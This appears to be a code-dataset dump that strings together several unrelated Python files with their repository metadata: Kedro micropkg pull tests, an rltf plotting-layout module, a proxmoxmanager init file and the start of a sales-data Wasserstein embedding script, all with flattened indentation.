fake_package_path,
env,
alias,
destination,
fake_metadata,
):
"""Test for pulling a valid sdist file locally, unpack it
into another location and check that unpacked files
are identical to the ones in the original modular pipeline.
"""
# pylint: disable=too-many-locals
pipeline_name = "another_pipeline"
call_pipeline_create(fake_project_cli, fake_metadata)
call_micropkg_package(fake_project_cli, fake_metadata, alias=pipeline_name)
source_path = fake_package_path / "pipelines" / PIPELINE_NAME
test_path = fake_repo_path / "src" / "tests" / "pipelines" / PIPELINE_NAME
source_params_config = (
fake_repo_path
/ settings.CONF_SOURCE
/ "base"
/ "parameters"
/ f"{PIPELINE_NAME}.yml"
)
sdist_file = (
fake_repo_path / "dist" / _get_sdist_name(name=pipeline_name, version="0.1")
)
assert sdist_file.is_file()
options = ["-e", env] if env else []
options += ["--alias", alias] if alias else []
options += ["--destination", destination] if destination else []
result = CliRunner().invoke(
fake_project_cli,
["micropkg", "pull", str(sdist_file), *options],
obj=fake_metadata,
)
assert result.exit_code == 0, result.output
assert "pulled and unpacked" in result.output
pipeline_name = alias or pipeline_name
destination = destination or Path()
source_dest = fake_package_path / destination / pipeline_name
test_dest = fake_repo_path / "src" / "tests" / destination / pipeline_name
config_env = env or "base"
dest_params_config = (
fake_repo_path
/ settings.CONF_SOURCE
/ config_env
/ "parameters"
/ f"{pipeline_name}.yml"
)
assert not filecmp.dircmp(source_path, source_dest).diff_files
assert not filecmp.dircmp(test_path, test_dest).diff_files
assert source_params_config.read_bytes() == dest_params_config.read_bytes()
def test_micropkg_pull_same_alias_package_name(
self,
fake_project_cli,
fake_repo_path,
fake_package_path,
fake_metadata,
):
call_pipeline_create(fake_project_cli, fake_metadata)
call_micropkg_package(fake_project_cli, fake_metadata)
sdist_file = (
fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
)
pipeline_name = PIPELINE_NAME
destination = "tools"
result = CliRunner().invoke(
fake_project_cli,
[
"micropkg",
"pull",
str(sdist_file),
"--destination",
destination,
"--alias",
pipeline_name,
],
obj=fake_metadata,
)
assert result.exit_code == 0, result.stderr
assert "pulled and unpacked" in result.output
source_dest = fake_package_path / destination / pipeline_name
test_dest = fake_repo_path / "src" / "tests" / destination / pipeline_name
config_env = "base"
params_config = (
fake_repo_path
/ settings.CONF_SOURCE
/ config_env
/ "parameters"
/ f"{pipeline_name}.yml"
)
self.assert_package_files_exist(source_dest)
assert params_config.is_file()
actual_test_files = {f.name for f in test_dest.iterdir()}
expected_test_files = {"__init__.py", "test_pipeline.py"}
assert actual_test_files == expected_test_files
def test_micropkg_pull_nested_destination(
self,
fake_project_cli,
fake_repo_path,
fake_package_path,
fake_metadata,
):
call_pipeline_create(fake_project_cli, fake_metadata)
call_micropkg_package(fake_project_cli, fake_metadata)
sdist_file = (
fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
)
pipeline_name = PIPELINE_NAME
destination = "pipelines/nested"
result = CliRunner().invoke(
fake_project_cli,
[
"micropkg",
"pull",
str(sdist_file),
"--destination",
destination,
"--alias",
pipeline_name,
],
obj=fake_metadata,
)
assert result.exit_code == 0, result.stderr
assert "pulled and unpacked" in result.output
source_dest = fake_package_path / destination / pipeline_name
test_dest = fake_repo_path / "src" / "tests" / destination / pipeline_name
config_env = "base"
params_config = (
fake_repo_path
/ settings.CONF_SOURCE
/ config_env
/ "parameters"
/ f"{pipeline_name}.yml"
)
self.assert_package_files_exist(source_dest)
assert params_config.is_file()
actual_test_files = {f.name for f in test_dest.iterdir()}
expected_test_files = {"__init__.py", "test_pipeline.py"}
assert actual_test_files == expected_test_files
def test_micropkg_alias_refactors_imports( # pylint: disable=too-many-locals
self, fake_project_cli, fake_package_path, fake_repo_path, fake_metadata
):
call_pipeline_create(fake_project_cli, fake_metadata)
pipeline_file = fake_package_path / "pipelines" / PIPELINE_NAME / "pipeline.py"
import_stmt = (
f"import {fake_metadata.package_name}.pipelines.{PIPELINE_NAME}.nodes"
)
with pipeline_file.open("a") as f:
f.write(import_stmt)
package_alias = "alpha"
pull_alias = "beta"
pull_destination = "pipelines/lib"
call_micropkg_package(
cli=fake_project_cli, metadata=fake_metadata, alias=package_alias
)
sdist_file = (
fake_repo_path / "dist" / _get_sdist_name(name=package_alias, version="0.1")
)
CliRunner().invoke(
fake_project_cli, ["micropkg", "pull", str(sdist_file)], obj=fake_metadata
)
CliRunner().invoke(
fake_project_cli,
[
"micropkg",
"pull",
str(sdist_file),
"--alias",
pull_alias,
"--destination",
pull_destination,
],
obj=fake_metadata,
)
pull = f"pipelines.lib.{pull_alias}"
for alias in (package_alias, pull):
alias_path = Path(*alias.split("."))
path = fake_package_path / alias_path / "pipeline.py"
file_content = path.read_text()
expected_stmt = f"import {fake_metadata.package_name}.{alias}.nodes"
assert expected_stmt in file_content
def test_micropkg_pull_from_aliased_pipeline_conflicting_name(
self, fake_project_cli, fake_package_path, fake_repo_path, fake_metadata
):
package_name = fake_metadata.package_name
call_pipeline_create(fake_project_cli, fake_metadata)
pipeline_file = fake_package_path / "pipelines" / PIPELINE_NAME / "pipeline.py"
import_stmt = f"import {package_name}.pipelines.{PIPELINE_NAME}.nodes"
with pipeline_file.open("a") as f:
f.write(import_stmt)
call_micropkg_package(
cli=fake_project_cli, metadata=fake_metadata, alias=package_name
)
sdist_file = (
fake_repo_path / "dist" / _get_sdist_name(name=package_name, version="0.1")
)
assert sdist_file.is_file()
result = CliRunner().invoke(
fake_project_cli, ["micropkg", "pull", str(sdist_file)], obj=fake_metadata
)
assert result.exit_code == 0, result.output
path = fake_package_path / package_name / "pipeline.py"
file_content = path.read_text()
expected_stmt = f"import {package_name}.{package_name}.nodes"
assert expected_stmt in file_content
def test_micropkg_pull_as_aliased_pipeline_conflicting_name(
self, fake_project_cli, fake_package_path, fake_repo_path, fake_metadata
):
package_name = fake_metadata.package_name
call_pipeline_create(fake_project_cli, fake_metadata)
pipeline_file = fake_package_path / "pipelines" / PIPELINE_NAME / "pipeline.py"
import_stmt = f"import {package_name}.pipelines.{PIPELINE_NAME}.nodes"
with pipeline_file.open("a") as f:
f.write(import_stmt)
call_micropkg_package(cli=fake_project_cli, metadata=fake_metadata)
sdist_file = (
fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
)
assert sdist_file.is_file()
result = CliRunner().invoke(
fake_project_cli,
["micropkg", "pull", str(sdist_file), "--alias", package_name],
obj=fake_metadata,
)
assert result.exit_code == 0, result.output
path = fake_package_path / package_name / "pipeline.py"
file_content = path.read_text()
expected_stmt = f"import {package_name}.{package_name}.nodes"
assert expected_stmt in file_content
def test_pull_sdist_fs_args(
self, fake_project_cli, fake_repo_path, mocker, tmp_path, fake_metadata
):
"""Test for pulling a sdist file with custom fs_args specified."""
call_pipeline_create(fake_project_cli, fake_metadata)
call_micropkg_package(fake_project_cli, fake_metadata)
call_pipeline_delete(fake_project_cli, fake_metadata)
fs_args_config = tmp_path / "fs_args_config.yml"
with fs_args_config.open(mode="w") as f:
yaml.dump({"fs_arg_1": 1, "fs_arg_2": {"fs_arg_2_nested_1": 2}}, f)
mocked_filesystem = mocker.patch("fsspec.filesystem")
sdist_file = (
fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
)
options = ["--fs-args", str(fs_args_config)]
CliRunner().invoke(
fake_project_cli, ["micropkg", "pull", str(sdist_file), *options]
)
mocked_filesystem.assert_called_once_with(
"file", fs_arg_1=1, fs_arg_2=dict(fs_arg_2_nested_1=2)
)
def test_pull_two_egg_info(
self, fake_project_cli, fake_repo_path, mocker, tmp_path, fake_metadata
):
"""Test for pulling an sdist file with more than one
dist-info directory.
"""
call_pipeline_create(fake_project_cli, fake_metadata)
call_micropkg_package(fake_project_cli, fake_metadata)
sdist_file = (
fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
)
assert sdist_file.is_file()
(tmp_path / f"{PIPELINE_NAME}-0.1" / "dummy.egg-info").mkdir(parents=True)
mocker.patch(
"kedro.framework.cli.micropkg.tempfile.TemporaryDirectory",
return_value=tmp_path,
)
result = CliRunner().invoke(
fake_project_cli,
["micropkg", "pull", str(sdist_file)],
obj=fake_metadata,
)
assert result.exit_code
assert "Error: More than 1 or no egg-info files found" in result.output
@pytest.mark.parametrize("env", [None, "local"])
@pytest.mark.parametrize("alias", [None, "alias_path"])
def test_pull_tests_missing(
self,
fake_project_cli,
fake_repo_path,
fake_package_path,
env,
alias,
fake_metadata,
):
"""Test for pulling a valid sdist file locally,
but `tests` directory is missing from the sdist file.
"""
# pylint: disable=too-many-locals
call_pipeline_create(fake_project_cli, fake_metadata)
test_path = fake_repo_path / "src" / "tests" / "pipelines" / PIPELINE_NAME
shutil.rmtree(test_path)
assert not test_path.exists()
call_micropkg_package(fake_project_cli, fake_metadata)
call_pipeline_delete(fake_project_cli, fake_metadata)
source_path = fake_package_path / "pipelines" / PIPELINE_NAME
source_params_config = (
fake_repo_path
/ settings.CONF_SOURCE
/ "base"
/ "parameters"
/ f"{PIPELINE_NAME}.yml"
)
# Make sure the files actually deleted before pulling from the sdist file.
assert not source_path.exists()
assert not source_params_config.exists()
sdist_file = (
fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
)
assert sdist_file.is_file()
options = ["-e", env] if env else []
options += ["--alias", alias] if alias else []
result = CliRunner().invoke(
fake_project_cli,
["micropkg", "pull", str(sdist_file), *options],
obj=fake_metadata,
)
assert result.exit_code == 0
pipeline_name = alias or PIPELINE_NAME
source_dest = fake_package_path / pipeline_name
test_dest = fake_repo_path / "src" / "tests" / pipeline_name
config_env = env or "base"
params_config = (
fake_repo_path
/ settings.CONF_SOURCE
/ config_env
/ "parameters"
/ f"{pipeline_name}.yml"
)
self.assert_package_files_exist(source_dest)
assert params_config.is_file()
assert not test_dest.exists()
@pytest.mark.parametrize("env", [None, "local"])
@pytest.mark.parametrize("alias", [None, "alias_path"])
def test_pull_config_missing(
self,
fake_project_cli,
fake_repo_path,
fake_package_path,
env,
alias,
fake_metadata,
):
"""
Test for pulling a valid sdist file locally, but `config` directory is missing
from the sdist file.
"""
# pylint: disable=too-many-locals
call_pipeline_create(fake_project_cli, fake_metadata)
source_params_config = (
fake_repo_path
/ settings.CONF_SOURCE
/ "base"
/ "parameters"
/ f"{PIPELINE_NAME}.yml"
)
source_params_config.unlink()
call_micropkg_package(fake_project_cli, fake_metadata)
call_pipeline_delete(fake_project_cli, fake_metadata)
source_path = fake_package_path / "pipelines" / PIPELINE_NAME
test_path = fake_repo_path / "src" / "tests" / "pipelines" / PIPELINE_NAME
# Make sure the files actually deleted before pulling from the sdist file.
assert not source_path.exists()
assert not test_path.exists()
sdist_file = (
fake_repo_path / "dist" / _get_sdist_name(name=PIPELINE_NAME, version="0.1")
)
assert sdist_file.is_file()
options = ["-e", env] if env else []
options += ["--alias", alias] if alias else []
result = CliRunner().invoke(
fake_project_cli,
["micropkg", "pull", str(sdist_file), *options],
obj=fake_metadata,
)
assert result.exit_code == 0
pipeline_name = alias or PIPELINE_NAME
source_dest = fake_package_path / pipeline_name
test_dest = fake_repo_path / "src" / "tests" / pipeline_name
config_env = env or "base"
dest_params_config = (
fake_repo_path
/ settings.CONF_SOURCE
/ config_env
/ "parameters"
/ f"{pipeline_name}.yml"
)
self.assert_package_files_exist(source_dest)
assert not dest_params_config.exists()
actual_test_files = {f.name for f in test_dest.iterdir()}
expected_test_files = {"__init__.py", "test_pipeline.py"}
assert actual_test_files == expected_test_files
@pytest.mark.parametrize("env", [None, "local"])
@pytest.mark.parametrize("alias", [None, "alias_path"])
def test_pull_from_pypi(
self,
fake_project_cli,
fake_repo_path,
mocker,
tmp_path,
fake_package_path,
env,
alias,
fake_metadata,
):
"""
Test for pulling a valid sdist file from pypi.
"""
# pylint: disable=too-many-locals
call_pipeline_create(fake_project_cli, fake_metadata)
# We mock the `pip download` call, and manually create a package sdist file
# to simulate the pypi scenario instead
call_micropkg_package(fake_project_cli, fake_metadata, destination=tmp_path)
version = "0.1"
sdist_file = tmp_path / _get_sdist_name(name=PIPELINE_NAME, version=version)
assert sdist_file.is_file()
call_pipeline_delete(fake_project_cli, fake_metadata)
source_path = fake_package_path / "pipelines" / PIPELINE_NAME
test_path = fake_repo_path / "src" / "tests" / "pipelines" / PIPELINE_NAME
source_params_config = (
fake_repo_path
/ settings.CONF_SOURCE
/ "base"
/ "parameters"
/ f"{PIPELINE_NAME}.yml"
)
# Make sure the files actually deleted before pulling from pypi.
assert not source_path.exists()
assert not test_path.exists()
assert not source_params_config.exists()
python_call_mock = mocker.patch("kedro.framework.cli.micropkg.python_call")
mocker.patch(
"kedro.framework.cli.micropkg.tempfile.TemporaryDirectory",
return_value=tmp_path,
)
options = ["-e", env] if env else []
options += ["--alias", alias] if alias else []
result = CliRunner().invoke(
fake_project_cli,
["micropkg", "pull", f"{PIPELINE_NAME}-{version}", *options],
obj=fake_metadata,
)
assert result.exit_code == 0
assert "pulled and unpacked" in result.output
python_call_mock.assert_called_once_with(
"pip",
[
"download",
"--no-deps",
"--dest",
str(tmp_path),
f"{PIPELINE_NAME}-{version}",
],
)
pipeline_name = alias or PIPELINE_NAME
source_dest = fake_package_path / pipeline_name
test_dest = fake_repo_path / "src" / "tests" / pipeline_name
config_env = env or "base"
dest_params_config = (
fake_repo_path
/ settings.CONF_SOURCE
/ config_env
/ "parameters"
/ f"{pipeline_name}.yml"
)
self.assert_package_files_exist(source_dest)
assert dest_params_config.is_file()
actual_test_files = {f.name for f in test_dest.iterdir()}
expected_test_files = {"__init__.py", "test_pipeline.py"}
assert actual_test_files == expected_test_files
def test_invalid_pull_from_pypi(
self, fake_project_cli, mocker, tmp_path, fake_metadata
):
"""
Test for pulling package from pypi, and it cannot be found.
"""
pypi_error_message = (
"ERROR: Could not find a version that satisfies the requirement"
)
python_call_mock = mocker.patch(
"kedro.framework.cli.micropkg.python_call",
side_effect=ClickException(pypi_error_message),
)
mocker.patch(
"kedro.framework.cli.micropkg.tempfile.TemporaryDirectory",
return_value=tmp_path,
)
invalid_pypi_name = "non_existent"
result = CliRunner().invoke(
fake_project_cli, ["micropkg", "pull", invalid_pypi_name], obj=fake_metadata
)
assert result.exit_code
python_call_mock.assert_called_once_with(
"pip", ["download", "--no-deps", "--dest", str(tmp_path), invalid_pypi_name]
)
assert pypi_error_message in result.stdout
def test_pull_from_pypi_more_than_one_sdist_file(
self, fake_project_cli, mocker, tmp_path, fake_metadata
):
"""
Test for pulling a sdist file with `pip download`, but there are more than one sdist
file to unzip.
"""
# We mock the `pip download` call, and manually create a package sdist file
# to simulate the pypi scenario instead
call_pipeline_create(fake_project_cli, fake_metadata)
call_micropkg_package(fake_project_cli, fake_metadata, destination=tmp_path)
call_micropkg_package(
fake_project_cli, fake_metadata, alias="another", destination=tmp_path
)
mocker.patch("kedro.framework.cli.micropkg.python_call")
mocker.patch(
"kedro.framework.cli.micropkg.tempfile.TemporaryDirectory",
return_value=tmp_path,
)
result = CliRunner().invoke(
fake_project_cli, ["micropkg", "pull", PIPELINE_NAME], obj=fake_metadata
)
assert result.exit_code
assert "Error: More than 1 or no sdist files found:" in result.output
def test_pull_unsupported_protocol_by_fsspec(
self, fake_project_cli, fake_metadata, tmp_path, mocker
):
protocol = "unsupported"
exception_message = f"Protocol not known: {protocol}"
error_message = "Error: More than 1 or no sdist files found:"
package_path = f"{protocol}://{PIPELINE_NAME}"
python_call_mock = mocker.patch("kedro.framework.cli.micropkg.python_call")
filesystem_mock = mocker.patch(
"fsspec.filesystem", side_effect=ValueError(exception_message)
)
mocker.patch(
"kedro.framework.cli.micropkg.tempfile.TemporaryDirectory",
return_value=tmp_path,
)
result = CliRunner().invoke(
fake_project_cli, ["micropkg", "pull", package_path], obj=fake_metadata
)
assert result.exit_code
filesystem_mock.assert_called_once_with(protocol)
python_call_mock.assert_called_once_with(
"pip", ["download", "--no-deps", "--dest", str(tmp_path), package_path]
)
assert exception_message in result.output
assert "Trying to use 'pip download'..." in result.output
assert error_message in result.output
@pytest.mark.usefixtures(
"chdir_to_dummy_project", "patch_log", "cleanup_dist", "cleanup_pyproject_toml"
)
class TestMicropkgPullFromManifest:
def test_micropkg_pull_all( # pylint: disable=too-many-locals
self, fake_repo_path, fake_project_cli, fake_metadata, mocker
):
# pylint: disable=import-outside-toplevel, line-too-long
from kedro.framework.cli import micropkg
spy = mocker.spy(micropkg, "_pull_package")
pyproject_toml = fake_repo_path / "pyproject.toml"
sdist_file = str(fake_repo_path / "dist" / _get_sdist_name("{}", "0.1"))
project_toml_str = textwrap.dedent(
f"""
[tool.kedro.micropkg.pull]
"{sdist_file.format("first")}" = {{alias = "dp", destination = "pipelines"}}
"{sdist_file.format("second")}" = {{alias = "ds", destination = "pipelines", env = "local"}}
"{sdist_file.format("third")}" = {{}}
"""
)
with pyproject_toml.open(mode="a") as file:
file.write(project_toml_str)
for name in ("first", "second", "third"):
call_pipeline_create(fake_project_cli, fake_metadata, pipeline_name=name)
call_micropkg_package(fake_project_cli, fake_metadata, pipeline_name=name)
call_pipeline_delete(fake_project_cli, fake_metadata, pipeline_name=name)
result = CliRunner().invoke(
fake_project_cli, ["micropkg", "pull", "--all"], obj=fake_metadata
)
assert result.exit_code == 0
assert "Micro-packages pulled and unpacked!" in result.output
assert spy.call_count == 3
build_config = toml.loads(project_toml_str)
pull_manifest = build_config["tool"]["kedro"]["micropkg"]["pull"]
for sdist_file, pull_specs in pull_manifest.items():
expected_call = mocker.call(sdist_file, fake_metadata, **pull_specs)
assert expected_call in spy.call_args_list
def test_micropkg_pull_all_empty_toml(
self, fake_repo_path, fake_project_cli, fake_metadata, mocker
):
# pylint: disable=import-outside-toplevel
from kedro.framework.cli import micropkg
spy = mocker.spy(micropkg, "_pull_package")
pyproject_toml = fake_repo_path / "pyproject.toml"
with pyproject_toml.open(mode="a") as file:
file.write("\n[tool.kedro.micropkg.pull]\n")
result = CliRunner().invoke(
fake_project_cli, ["micropkg", "pull", "--all"], obj=fake_metadata
)
assert result.exit_code == 0
expected_message = (
"Nothing to pull. Please update the `pyproject.toml` package "
"manifest section."
)
assert expected_message in result.output
assert not spy.called
def test_invalid_toml(self, fake_repo_path, fake_project_cli, fake_metadata):
pyproject_toml = fake_repo_path / "pyproject.toml"
with pyproject_toml.open(mode="a") as file:
file.write("what/toml?")
result = CliRunner().invoke(
fake_project_cli, ["micropkg", "pull", "--all"], obj=fake_metadata
)
assert result.exit_code
assert isinstance(result.exception, toml.TomlDecodeError)
def test_micropkg_pull_no_arg_provided(self, fake_project_cli, fake_metadata):
result = CliRunner().invoke(
fake_project_cli, ["micropkg", "pull"], obj=fake_metadata
)
assert result.exit_code
expected_message = (
"Please specify a package path or add '--all' to pull all micro-packages in the"
" `pyproject.toml` package manifest section."
)
assert expected_message in result.output
| 36.404028 | 104 | 0.615818 | 3,511 | 30,725 | 5.05554 | 0.074907 | 0.059493 | 0.058366 | 0.04969 | 0.824732 | 0.804676 | 0.797746 | 0.776169 | 0.75707 | 0.736338 | 0 | 0.002648 | 0.287225 | 30,725 | 843 | 105 | 36.447212 | 0.807854 | 0.051261 | 0 | 0.65812 | 0 | 0.001425 | 0.134204 | 0.036143 | 0 | 0 | 0 | 0 | 0.125356 | 1 | 0.032764 | false | 0 | 0.034188 | 0 | 0.069801 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7734ad4d5ca2800b65ba911d0e6a3864866d2e85 | 7,262 | py | Python | rltf/utils/layouts.py | nikonikolov/rltf | d56714494f73e53ed4b41d6376d942332b406885 | [
"MIT"
] | 90 | 2018-05-02T17:15:52.000Z | 2021-11-09T08:53:44.000Z | rltf/utils/layouts.py | arita37/rltf | d56714494f73e53ed4b41d6376d942332b406885 | [
"MIT"
] | 1 | 2019-10-01T11:41:53.000Z | 2019-12-08T15:38:53.000Z | rltf/utils/layouts.py | arita37/rltf | d56714494f73e53ed4b41d6376d942332b406885 | [
"MIT"
] | 25 | 2018-01-14T16:56:44.000Z | 2021-11-09T08:53:48.000Z | from collections import OrderedDict
def plot_bars(ax, kwargs, env, color):
x = atari_labels(env.unwrapped.get_action_meanings())
return ax.bar(x=x, **kwargs, color=color)
def plot_highlight_bars(ax, kwargs, env, color_n='#1f77b4', color_hi='#d62728'):
x = atari_labels(env.unwrapped.get_action_meanings())
color = [color_n] * len(x)
a = kwargs.pop("a")
color[a] = color_hi
return ax.bar(x=x, **kwargs, color=color)
def atari_labels(x):
for i, label in enumerate(x):
if label[-4:] == "FIRE":
if len(label) > 4:
end = "\nFIRE"
length = len(label[:-4])
if length >= 6:
if label[:2] == "UP":
start = "UP\n" + label[2:-4]
elif label[:4] == "DOWN":
start = "DOWN\n" + label[4:-4]
else:
raise ValueError
else:
start = label[:-4]
x[i] = start + end
elif len(label) >= 6:
length = len(label)
if label[:2] == "UP":
x[i] = "UP\n" + label[2:]
elif label[:4] == "DOWN":
x[i] = "DOWN\n" + label[4:]
else:
raise ValueError
return x
qrdqn_layout = {
"width": 900,
"height": 440,
"obs_align": dict(vertical='center', horizontal='left'),
# "obs_scale": 1.0,
"figures": {
"train_actions": {
"align": dict(vertical='center', horizontal='right'),
"width": 720,
"height": -1,
"fig": {
"subplots": dict(nrows=2, ncols=1, sharex=True),
"subplots_conf": OrderedDict(
a_q={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="Q FUNCTION", size=6),
},
a_z_var={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="Z VARIANCE", size=6),
},
# a_z={
# "tick_params": dict(axis='y', labelsize=5.5),
# "set_title": dict(label="Z", size=6),
# },
),
"subplots_common": {
"grid": dict(linewidth=0.2),
"tick_params": dict(axis='x', labelsize=6.5),
},
"fig_conf": {
"tight_layout": dict(pad=1.0, h_pad=0.0),
},
},
"plot_function": plot_highlight_bars,
},
"eval_actions": {
"align": dict(vertical='center', horizontal='right'),
"width": 720,
"height": -1,
"fig": {
"subplots": dict(nrows=2, ncols=1),
"subplots_conf": OrderedDict(
a_q={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="Q FUNCTION", size=6),
},
a_z_var={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="Z VARINACE", size=6),
},
# a_z={
# "tick_params": dict(axis='y', labelsize=5.5),
# "set_title": dict(label="Z", size=6),
# },
),
"subplots_common": {
"tick_params": dict(axis='x', labelsize=6.5),
},
"fig_conf": {
"tight_layout": dict(pad=1.0, h_pad=0.0),
},
},
"plot_function": plot_highlight_bars,
},
}
}
ids_homoscedastic_layout = {
"width": 800,
"height": 300,
"obs_align": dict(vertical='center', horizontal='left'),
# "obs_scale": 1.0,
"figures": {
"train_actions": {
"align": dict(vertical='center', horizontal='right'),
"width": 620,
"height": -1,
"fig": {
"subplots": dict(nrows=3, ncols=1, sharex=True),
"subplots_conf": OrderedDict(
a_mean={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="MEAN", size=6),
},
a_std={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="STD", size=6),
},
a_ids={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="IDS", size=6),
},
),
"subplots_common": {
"grid": dict(linewidth=0.2),
"tick_params": dict(axis='x', labelsize=6.5),
},
"fig_conf": {
"tight_layout": dict(pad=1.0, h_pad=0.0),
},
},
"plot_function": plot_highlight_bars,
},
"eval_actions": {
"align": dict(vertical='center', horizontal='right'),
"width": 620,
"height": -1,
"fig": {
"subplots": dict(nrows=1, ncols=1),
"subplots_conf": OrderedDict(
a_mean={
"set_title": dict(label="MEANS", size=8),
"tick_params": dict(axis='y', labelsize=8),
},
# a_vote={
# "set_title": dict(label="VOTES", size=8),
# "tick_params": dict(axis='y', labelsize=8),
# },
),
"subplots_common": {
"tick_params": dict(axis='x', labelsize=6.5),
},
"fig_conf": {
"tight_layout": dict(pad=1.0, h_pad=0.0),
},
},
"plot_function": plot_highlight_bars,
},
}
}
ids_heteroscedastic_layout = {
"width": 840,
"height": 440,
"obs_align": dict(vertical='center', horizontal='left'),
# "obs_scale": 1.0,
"figures": {
"train_actions": {
"align": dict(vertical='center', horizontal='right'),
"width": 660,
"height": -1,
"fig": {
"subplots": dict(nrows=4, ncols=1, sharex=True),
"subplots_conf": OrderedDict(
a_mean={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="MEAN", size=6),
},
a_std={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="STD", size=6),
},
a_rho2={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label=r'$RHO^2$', size=6),
},
a_ids={
"tick_params": dict(axis='y', labelsize=5.5),
"set_title": dict(label="IDS", size=6),
},
),
"subplots_common": {
"grid": dict(linewidth=0.2),
"tick_params": dict(axis='x', labelsize=6.5),
},
"fig_conf": {
"tight_layout": dict(pad=1.0, h_pad=0.0),
},
},
"plot_function": plot_highlight_bars,
},
"eval_actions": {
"align": dict(vertical='center', horizontal='right'),
"width": 660,
"height": -1,
"fig": {
"subplots": dict(nrows=1, ncols=1),
"subplots_conf": OrderedDict(
a_mean={
"set_title": dict(label="MEANS", size=8),
"tick_params": dict(axis='y', labelsize=8),
},
# a_vote={
# "set_title": dict(label="VOTES", size=8),
# "tick_params": dict(axis='y', labelsize=8),
# },
),
"subplots_common": {
"tick_params": dict(axis='x', labelsize=6.5),
},
"fig_conf": {
"tight_layout": dict(pad=1.0, h_pad=0.0),
},
},
"plot_function": plot_highlight_bars,
},
}
}
layouts = {
"QRDQN": qrdqn_layout,
"DQN_IDS": ids_homoscedastic_layout,
"BDQN_IDS": ids_homoscedastic_layout,
"C51_IDS": ids_heteroscedastic_layout,
"QRDQN_IDS": ids_heteroscedastic_layout,
}
| 28.256809 | 80 | 0.495731 | 847 | 7,262 | 4.072019 | 0.141677 | 0.066686 | 0.09336 | 0.120035 | 0.81067 | 0.799072 | 0.799072 | 0.799072 | 0.772398 | 0.753842 | 0 | 0.035945 | 0.318094 | 7,262 | 256 | 81 | 28.367188 | 0.660541 | 0.062104 | 0 | 0.604545 | 0 | 0 | 0.192461 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013636 | false | 0 | 0.004545 | 0 | 0.031818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
773ac63ab0430b4500d79b608bc9cee6f43580ec | 33 | py | Python | proxmoxmanager/__init__.py | igorlitvak/proxmoxmanager | 3cd31a394350dd555236fa363b37fcb9e86fa20c | [
"MIT"
] | null | null | null | proxmoxmanager/__init__.py | igorlitvak/proxmoxmanager | 3cd31a394350dd555236fa363b37fcb9e86fa20c | [
"MIT"
] | null | null | null | proxmoxmanager/__init__.py | igorlitvak/proxmoxmanager | 3cd31a394350dd555236fa363b37fcb9e86fa20c | [
"MIT"
] | null | null | null | from .main import ProxmoxManager
| 16.5 | 32 | 0.848485 | 4 | 33 | 7 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121212 | 33 | 1 | 33 | 33 | 0.965517 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
77496336f4868d138adf58642534e63629aea473 | 7,284 | py | Python | sales_main.py | svenhsia/Entropic-Wasserstein-Embedding | db837b92759cb5c921e7c06b2357861ec687e9de | [
"MIT"
] | 10 | 2019-08-01T07:41:11.000Z | 2021-08-09T20:52:37.000Z | sales_main.py | svenhsia/Entropic-Wasserstein-Embedding | db837b92759cb5c921e7c06b2357861ec687e9de | [
"MIT"
] | null | null | null | sales_main.py | svenhsia/Entropic-Wasserstein-Embedding | db837b92759cb5c921e7c06b2357861ec687e9de | [
"MIT"
] | null | null | null | import os
import sys
from time import time
import logging
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO)
import numpy as np
import tensorflow as tf
from utils import *
org_distances = np.loadtxt('./data/Sales_Transaction_Dataset.dist', delimiter=',')
logging.info("Load DTW distance data from local file")
file_name = 'Sales'
embed_dims = [30]
n_epochs = 30
batch_size = 4096
num_nodes = org_distances.shape[0]
distance_adjustment = 1e-5
node_pairs = np.array([[i, j] for i in range(num_nodes) for j in range(i+1, num_nodes)])
obj_distances_origin = np.array([org_distances[i, j] for i in range(num_nodes) for j in range(i+1, num_nodes)])
logging.info("node pairs shape: {}, obj_distances shape: {}".format(
node_pairs.shape, obj_distances_origin.shape))
max_try = 1
normalize_distance = True
if normalize_distance:
obj_min = obj_distances_origin.min()
obj_max = obj_distances_origin.max()
obj_distances = (obj_distances_origin - obj_min) / (obj_max - obj_min) + distance_adjustment
else:
obj_distances = obj_distances_origin + distance_adjustment
for embed_dim in embed_dims:
# Wass R2
logging.info("Running Wasserstein R2 embedding, embed dim={}".format(embed_dim))
